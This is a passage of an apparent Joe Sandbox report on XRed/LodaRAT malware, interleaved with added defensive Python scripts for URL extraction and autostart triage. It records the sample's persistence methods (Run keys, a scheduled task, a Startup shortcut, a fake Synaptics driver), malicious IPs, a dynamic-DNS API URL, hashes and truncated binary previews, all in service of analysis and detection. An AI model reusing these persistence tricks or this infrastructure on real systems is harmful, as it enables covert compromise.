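               if not any(f2 == f and i2 != i and i2.startswith(i) for f2, i2 in objects)}
    return {"hosts": sorted(hosts), "objects": sorted(objects), "noise": noise}


if __name__ == "__main__":
    for k, v in extract(SCRAPED).items():
        print(k, v)
```

The prefix rule is a heuristic: it relies on the clean form of a string also being present (as it is in this report, where each truncated or overrun variant sits beside a clean one) and it would wrongly discard a short URL that is a genuine prefix of an unrelated longer one, so review the noise list rather than discarding it.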
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.46 | docs.google.com | United States | 15169 | GOOGLEUS | false
172.217.23.97 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
172.111.138.100 | unknown | United States | 3223 | VOXILITYGB | true
69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582334
Start date and time: 2024-12-30 11:23:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 14s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 23
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: AYRASY.exe
Detection: MAL
Classification: mal100.troj.expl.evad.winEXE@21/28@5/4
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 92
• Number of non-executed functions: 282
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.109.28.46, 184.28.90.27, 52.113.194.132, 20.189.173.17, 104.208.16.94, 13.107.246.45, 20.190.159.23, 20.109.210.53, 13.107.253.44
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprdwus22.westus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net, uks-azsc-config.officeapps.live.com
• Not all processes were analysed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadFile calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
05:24:21 | API Interceptor | 75x Sleep call for process: Synaptics.exe modified
05:24:34 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
11:24:09 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WBHUSK "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
11:24:10 | Task Scheduler | Run new task: WBHUSK.exe path: C:\Users\user\AppData\Roaming\Windata\YOABSG.exe
11:24:18 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe
11:24:26 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WBHUSK "C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
11:24:34 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WBHUSK.lnk
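The timeline above shows one payload (YOABSG.exe under AppData\Roaming) registered three separate ways within 25 seconds: a Run value in HKCU, a scheduled task, and a Startup-folder .lnk, plus a second payload parked in HKLM\...\Run under a vendor-sounding name from C:\ProgramData. On a live host the same picture comes from `reg export` of the Run keys, `schtasks /query /fo csv /v`, and resolving the Startup .lnk targets. The block below is an added triage example, not Joe Sandbox code: it parses constructed copies of those three inputs, keeps every autostart whose executable lives in a user-writable directory, and groups the hits by target so a payload registered in several places shows up once. The registry export and task CSV are constructed to mirror the entries above, and the task CSV column names are an assumption.

```python
import csv
import io
import re

# Directories an unprivileged user (or a dropper running as one) can write to.
USER_WRITABLE = re.compile(
    r"\\(AppData|ProgramData|Users\\Public|Temp|Desktop|Downloads)\\", re.IGNORECASE)

# Constructed `reg export` text (.reg syntax: backslashes and quotes escaped).
REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"WBHUSK"="\"C:\\Users\\user\\AppData\\Roaming\\Windata\\YOABSG.exe\""
"OneDrive"="\"C:\\Users\\user\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Synaptics Pointing Device Driver"="C:\\ProgramData\\Synaptics\\Synaptics.exe"
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
'''

# Constructed subset of `schtasks /query /fo csv /v` output (column names assumed).
TASKS_CSV = r'''"HostName","TaskName","Status","Author","Task To Run"
"WIN10","\WBHUSK.exe","Ready","user","C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"
"WIN10","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$"
'''

# Startup-folder shortcuts with their targets already resolved (constructed).
STARTUP_LINKS = [
    (r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WBHUSK.lnk",
     r"C:\Users\user\AppData\Roaming\Windata\YOABSG.exe"),
]


def reg_unescape(data):
    return re.sub(r"\\(.)", r"\1", data)


def parse_reg_run(text):
    """Yield (key, value name, command) for each string value in a .reg export."""
    key = None
    for line in text.splitlines():
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
        elif line.startswith('"') and key:
            m = re.match(r'^"([^"]*)"="((?:[^"\\]|\\.)*)"$', line)
            if m:
                yield key, m.group(1), reg_unescape(m.group(2))


def exe_of(command):
    """First executable of a command line: the quoted token, else up to '.exe'."""
    m = (re.match(r'\s*"([^"]+)"', command)
         or re.match(r"\s*(.+?\.exe)\b", command, re.IGNORECASE))
    return m.group(1) if m else command.split()[0]


def collect(reg_text, tasks_csv, startup_links):
    """Flatten all three sources into (location, executable) pairs."""
    entries = []
    for key, name, cmd in parse_reg_run(reg_text):
        entries.append((f"{key}\\{name}", exe_of(cmd)))
    for row in csv.DictReader(io.StringIO(tasks_csv)):
        entries.append((f"Task {row['TaskName']} (author {row['Author']})",
                        exe_of(row["Task To Run"])))
    for lnk, target in startup_links:
        entries.append((f"Startup {lnk}", target))
    return entries


def triage(entries):
    """Map each user-writable autostart target to the locations registering it."""
    by_target = {}
    for location, exe in entries:
        if USER_WRITABLE.search(exe):
            by_target.setdefault(exe, []).append(location)
    return by_target


if __name__ == "__main__":
    for exe, locations in triage(collect(REG_EXPORT, TASKS_CSV, STARTUP_LINKS)).items():
        print(exe)
        for loc in locations:
            print("   ", loc)
```

The user-writable test is a lead, not a verdict: OneDrive legitimately runs from AppData\Local and is flagged here alongside YOABSG.exe, so the next step is signature, hash and parent-process context. What the grouping does give you is the redundancy: one executable registered under HKCU\Run, as a scheduled task and in the Startup folder is a dropper pattern, not how software installs itself.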
                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                        172.111.138.100mmi8nLybam.exeGet hashmaliciousLodaRATBrowse
                                                                                                          Supplier 0202AW-PER2 Sheet.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                            Purchase Order No. G02873362-Docx.vbsGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                              New PO - Supplier 0202AW-PER2.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                RNEQTT.exeGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                  Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                    Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                                                                                                                      bf-p2b.exeGet hashmaliciousLodaRATBrowse
                                                                                                                        gry.exeGet hashmaliciousUnknownBrowse
                                                                                                                          dlawt.exeGet hashmaliciousLodaRatBrowse
Match: 69.42.215.252
Associated Sample Name / URL | Detection | Threat Name | Context
Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
zhuzhu.exe | malicious | GhostRat, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
blq.exe | malicious | Gh0stCringe, RunningRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
RNEQTT.exe | malicious | LodaRAT, XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
ZmrwoZsbPp.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
ccmsetup.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Synaptics.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
RezQY7jWu8.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
Match: freedns.afraid.org
Associated Sample Name / URL | Detection | Threat Name | Context
Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 69.42.215.252
zhuzhu.exe | malicious | GhostRat, XRed | 69.42.215.252
Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 69.42.215.252
blq.exe | malicious | Gh0stCringe, RunningRAT, XRed | 69.42.215.252
New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | 69.42.215.252
RNEQTT.exe | malicious | LodaRAT, XRed | 69.42.215.252
ZmrwoZsbPp.exe | malicious | XRed | 69.42.215.252
ccmsetup.exe | malicious | XRed | 69.42.215.252
Synaptics.exe | malicious | XRed | 69.42.215.252
RezQY7jWu8.exe | malicious | XRed | 69.42.215.252
Match: VOXILITYGB
Associated Sample Name / URL | Detection | Threat Name | Context
mmi8nLybam.exe | malicious | LodaRAT | 172.111.138.100
Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 172.111.138.100
loligang.mips.elf | malicious | Mirai | 104.250.189.221
Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 172.111.138.100
New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | 172.111.138.100
RNEQTT.exe | malicious | LodaRAT, XRed | 172.111.138.100
1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe | malicious | Remcos | 104.243.246.120
nabsh4.elf | malicious | Unknown | 46.243.206.70
7jBzTH9FXQ.exe | malicious | Unknown | 37.221.166.158
fACYdCvub8.exe | malicious | Unknown | 5.254.60.108

Match: AWKNET-LLCUS
Associated Sample Name / URL | Detection | Threat Name | Context
222.exe | malicious | LodaRAT, XRed | 69.42.215.252
Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 69.42.215.252
zhuzhu.exe | malicious | GhostRat, XRed | 69.42.215.252
Purchase Order No. G02873362-Docx.vbs | malicious | LodaRAT, XRed | 69.42.215.252
blq.exe | malicious | Gh0stCringe, RunningRAT, XRed | 69.42.215.252
New PO - Supplier 0202AW-PER2.exe | malicious | LodaRAT, XRed | 69.42.215.252
RNEQTT.exe | malicious | LodaRAT, XRed | 69.42.215.252
ZmrwoZsbPp.exe | malicious | XRed | 69.42.215.252
ccmsetup.exe | malicious | XRed | 69.42.215.252
Synaptics.exe | malicious | XRed | 69.42.215.252
Match: 37f463bf4616ecd445d4a1937da06e19
Associated Sample Name / URL | Detection | Threat Name | Context
222.exe | malicious | LodaRAT, XRed | 142.250.186.46, 172.217.23.97
Supplier 0202AW-PER2 Sheet.exe | malicious | LodaRAT, XRed | 142.250.186.46, 172.217.23.97
zhuzhu.exe | malicious | GhostRat, XRed | 142.250.186.46, 172.217.23.97
setup.msi | malicious | Unknown | 142.250.186.46, 172.217.23.97
Lets-x64.exe | malicious | Nitol, Zegost | 142.250.186.46, 172.217.23.97
KL-3.1.16.exe | malicious | Nitol, Zegost | 142.250.186.46, 172.217.23.97
Whyet-4.9.exe | malicious | Nitol, Zegost | 142.250.186.46, 172.217.23.97
QQyisSetups64.exe | malicious | GhostRat | 142.250.186.46, 172.217.23.97
wyySetups64.exe | malicious | GhostRat | 142.250.186.46, 172.217.23.97
No context
Process: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 118
Entropy (8bit): 3.5700810731231707
Encrypted: false
SSDEEP: 3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
MD5: 573220372DA4ED487441611079B623CD
SHA1: 8F9D967AC6EF34640F1F0845214FBC6994C0CB80
SHA-256: BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
SHA-512: F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
Malicious: false
Reputation: high, very likely benign file
Preview:
<?xml version="1.0" encoding="UTF-16"?>
<HeartbeatCache/>
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 1.1336775162267894
Encrypted: false
SSDEEP: 192:WfOVpsosImm0BU/3DzJDzqjLOA/FccBFzuiFdZ24IO8EKDzy:lyL3BU/3JqjkizuiFdY4IO8zy
MD5: 5C0CD3144A182CD984EAF3D74EB574DC
SHA1: 55AA57E6DEA3EF488D286F05966AFEB29EEE833A
SHA-256: F4CF5F98DA33292B7886F5FECE5763BE5BBEC3A3C8D094D14C8338F9BDB3E4EC
SHA-512: F72BC283499C9F02E5B11B4FB3E9159E144E3554F4C35E64A4836905217C44D1FDFD598A669E901897D060C0A41C8416A6F0673EC1BDEB90626F14A5EED01287
Malicious: false
Preview:
Version=1
EventType=APPCRASH
EventTime=133800278690469211
ReportType=2
Consent=1
UploadTime=133800278723594215
ReportStatus=524384
ReportIdentifier=d3d18fab-5b89-4e6f-986b-da59d36e17e2
IntegratorReportIdentifier=02b175bc-82cc-43fc-8b6c-60eef8c8482e
Wow64Host=34404
Wow64Guest=332
NsAppName=Synaptics.exe
AppSessionGuid=000013b8-0001-0015-5197-71f4a45adb01
TargetAppId=W:0006b99a137d593dda9d158dc8b6b7720deb00001f04!00003cf48608e3c73115e37316a49f47d3586c5c94e1!Synaptics.exe
TargetAppVe
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Mon Dec 30 10:24:31 2024, 0x1205a4 type
Category: dropped
Size (bytes): 748452
Entropy (8bit): 2.261017320918558
Encrypted: false
SSDEEP: 3072:mp0runcr4taeXXLA9UxNB4eMp5mrps8oHbINT:muinaiXbaSqeMp5mrps8o72
MD5: 39D1ACD502E1D52CCCC92BA805A45DDE
SHA1: 30C72334AC7E3C01DD3D67143B93BFEA08F4618E
SHA-256: E6D80F9C9DA75CD28FDC2974AE9D579479477183E98116ACAFC21ECB6E4E11FF
SHA-512: EFCAF39B248A2EA4FEBE660F21B45BB92BB404A13476BEBC9A5B4A50CD01BFD34E8D40667EFAD81B5774BC27A27FF30B578E7B6413813E6BD9D09D3276940A26
Malicious: false
Preview: MDMP..a..... ........trg....................................$....6.......).../..........`.......8...........T...........h...<............6...........8..............................................................................eJ......(9......GenuineIntel............T............trg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 6316
Entropy (8bit): 3.716206454733045
Encrypted: false
SSDEEP: 192:R6l7wVeJsx96ZVv0UYiSEYprs89bYSsfgom:R6lXJa6ZVfYsMYRfW
MD5: 317D5E22CAB679ACCBE1EDF39A21E7CE
SHA1: 777BC24EEAF1899168DF2682BE24803648493291
SHA-256: 82F7B078EF10BD063038135B744FA6D09363AFA4F23D1C91026E302D1541091E
SHA-512: A2C3A5F7769A842AD11182AD7CD75BC4238D81AB79B4FB1E4352EA75A02E60A4CE1EF110A9C76CEDDA13E440BB795499B20251F1CD13DCFD2FBE6E7E4AFC6570
Malicious: false
Preview:
<?xml version="1.0" encoding="UTF-16"?>
<WERReportMetadata>
	<OSVersionInformation>
		<WindowsNTVersion>10.0</WindowsNTVersion>
		<Build>19045</Build>
		<Product>(0x30): Windows 10 Pro</Product>
		<Edition>Professional</Edition>
		<BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>
		<Revision>2006</Revision>
		<Flavor>Multiprocessor Free</Flavor>
		<Architecture>X64</Architecture>
		<LCID>2057</LCID>
	</OSVersionInformation>
	<ProcessInformation>
		<Pid>5048</Pi
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4572
Entropy (8bit): 4.448488005078407
Encrypted: false
SSDEEP: 48:cvIwWl8zs4qJg77aI9VaWpW8VYIYm8M4JFAF0V+q84vBdZld:uIjfvI77b7VIJRVZBdZld
MD5: B33525AE24187F4717BBE8579FC02631
SHA1: 56E14A689B0CB32F18F27CC8F70CB65586E1C8D2
SHA-256: AB062D2F3CF3969B476D42DAFBD08C28304ACE423AEEA1E48A915294A5536B92
SHA-512: 25574FB211B14B1FCB0F6B6239ACB56671D7940B0CDB3ECC0C1B695845301608F50506B1D95CBC0C29E106BAE5353E91DBFD5D1DE620153160878B1DC3ACD10D
Malicious: false
Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="653847" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                            Process:C:\Users\user\Desktop\AYRASY.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):771584
                                                                                                                            Entropy (8bit):6.639994041359131
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Igr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                                                            MD5:27C056CC4DAFB6B3161272E800C85E55
                                                                                                                            SHA1:3CF48608E3C73115E37316A49F47D3586C5C94E1
                                                                                                                            SHA-256:8445CFA3304BBC48A8616AABA0881A2433E52B839DD5E6234DF8776AE7873C26
                                                                                                                            SHA-512:0D0A77C959BA38555E49C1ECDB5530A8D0D2C0D4BCF4B7BF91A82854D82ED139F0737C9024979F148B67AA2287B087F585B0F9B69F931733B4BDE32D491FECB7
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX4413.tmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX4413.tmp, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 100%
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                                                                                            Process:C:\Users\user\Desktop\AYRASY.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1750016
                                                                                                                            Entropy (8bit):7.48957166237222
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:49152:jnsHyjtk2MYC5GDIhloJfEEaiSgCkqoHisJ:jnsmtk2athlVER3CkqoHxJ
                                                                                                                            MD5:07E25C260C13B82CD867DAEF02255C82
                                                                                                                            SHA1:EBC6562D3EB2A877D8CFEAFCADA1E1AF1A66E208
                                                                                                                            SHA-256:72D043DCD766DA3F32477C3C1612165B2124F347013BBB69BA3DA85EAF9E3D40
                                                                                                                            SHA-512:DCF874250B8B302FFF6BA5466B240660D06613838BC24FF76AB8F060AD8FB6DDBDFD58548034D08AB43906DD4B0F91A3AD2F31FE298DC20005F8A0A48873AFD9
                                                                                                                            Malicious:true
                                                                                                                            Yara Hits:
                                                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................
                                                                                                                            Process:C:\Users\user\Desktop\AYRASY.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26
                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                            Malicious:true
                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.2670699863356685
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0JcDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6U+pAZewRDK4mW
                                                                                                                            MD5:D0BB783DD7AB888B1C930D874D0EBE41
                                                                                                                            SHA1:E4692FC71C3EDE7B100CE5310AAD92578DE92A64
                                                                                                                            SHA-256:D1B6C6C65ACC050811DDC3085C7DBDD312E123418C465E0213DC696E727CA7B8
                                                                                                                            SHA-512:294EEA3564F0B5C4970F35C5E30DBBFF3451AA77B0AF29C1BA8C75E86FE24A4B9FF5D793E1EFFF151E355124D376F2F5A4ABE49F6666AA5AD3281E72031D662B
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Q3U1MVJmSp5WaUuOyqhadA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.266199546277303
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0DSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+U+pAZewRDK4mW
                                                                                                                            MD5:73395838E5A6F6868C4920C1E6C04C91
                                                                                                                            SHA1:24B56B28ABE011B9F5A569896AE6D3DAA14E1509
                                                                                                                            SHA-256:DCE50AAECF355A717E3820D478A5D3207BC9861C4A30557C7DF01FC986DB3462
                                                                                                                            SHA-512:4E6DC58781909A7151250CCF14426B0D56AE78EB2CF8BD3FE4A088CFF7B4E09FA935AC3B144631DC612984BA39D053CD2A791E14FF0CFE481B3ACEBE5984CED1
                                                                                                                            Malicious:false
                                                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="l2A4SB25BB91UzXsXaNCTw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1652
                                                                                                                            Entropy (8bit):5.25380787355666
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:GgsF+0NqDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+kqD+pAZewRDK4mW
                                                                                                                            MD5:92F2635DC1E96AA345D5CCFC25CA5EB1
                                                                                                                            SHA1:90F6BCB4BB4C0F1210D265B0327159355E552A0B
